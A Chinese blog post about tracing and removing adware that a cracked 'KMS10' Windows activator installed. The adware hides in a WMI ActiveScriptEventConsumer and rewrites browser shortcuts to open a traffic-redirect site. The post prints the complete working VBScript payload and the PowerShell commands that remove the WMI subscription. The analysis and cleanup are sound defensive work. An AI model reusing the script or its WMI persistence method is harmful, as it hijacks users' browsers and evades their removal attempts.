小马 KMS10激活系统后的浏览器小尾巴分析与清除

装了Win10, 要激活, 于是网上下载了一个所谓的小马KMS10激活

没想到中招了, 结果浏览器总是被加小尾巴跳转到hao123

系统目录的KMS10文件夹删除了, 注册表搜索删除了. 快捷方式手动清理干净了, 添加的二个计划任务也删除了

可是没用啊

没用啊, 怎么办... Explorer进程加载的DLL 系统服务, 观察一圈没发现异常啊.  网上百度, Google好多圈
一点用也没, 都是些抄来抄去的贴子.  重装系统, 这不符合我的风格呀(其实是软件太多, 重装太麻烦)


于是装了一个HIPS, 发现原来是


scrcons.exe 他在修改快捷方式. 于是百度之, 引出来WMI, 仔细一看, 乖乖, 三无后门
(“三无”后门的核心就是WMI中的永久事件消费者ActiveScriptEventConsumer)


于是网上下载了一个工具WIMExplorer 这里贴个下载地址 http://www.ks-soft.net/hostmon.eng/wmi/
一看 ActiveScriptEventConsumer 里面果然有一个vbs脚本再一看内容, 这不正是查找多日的小尾巴吗, 果断删除

从此世界清静了

下面大家看看小马的脚本

On Error Resume NextConst link = "http://hao.qquu8.com/?v=108&m=yx"Const link360 = "http://hao.qquu8.com/?v=108&m=yx&s=3"browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"browsersArr = Split(browsers,",")Set oDic = CreateObject("scripting.dictionary")For Each browser In browsersArr    oDic.Add LCase(browser), browserNextlnkpathsArr = Split(lnkpaths,",")Set oFolders = CreateObject("scripting.dictionary")For Each lnkpath In lnkpathsArr    oFolders.Add lnkpath, lnkpathNextSet fso = CreateObject("Scripting.Filesystemobject")Set WshShell = CreateObject("Wscript.Shell")For Each oFolder In oFolders    If fso.FolderExists(oFolder) Then        For Each file In fso.GetFolder(oFolder).Files            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then                Set oShellLink = WshShell.CreateShortcut(file.Path)                path = oShellLink.TargetPath                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)                If oDic.Exists(LCase(name)) Then                    If LCase(name) = LCase("360se.exe") Then                        oShellLink.Arguments = link360                    Else                        oShellLink.Arguments = link                    End If                    If file.Attributes And 1 Then                        file.Attributes = file.Attributes - 1                    End If                    oShellLink.Save                End If            End If        Next    End IfNext

删除方法如下:

以管理员身份运行PowerShell
执行以下命令

gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject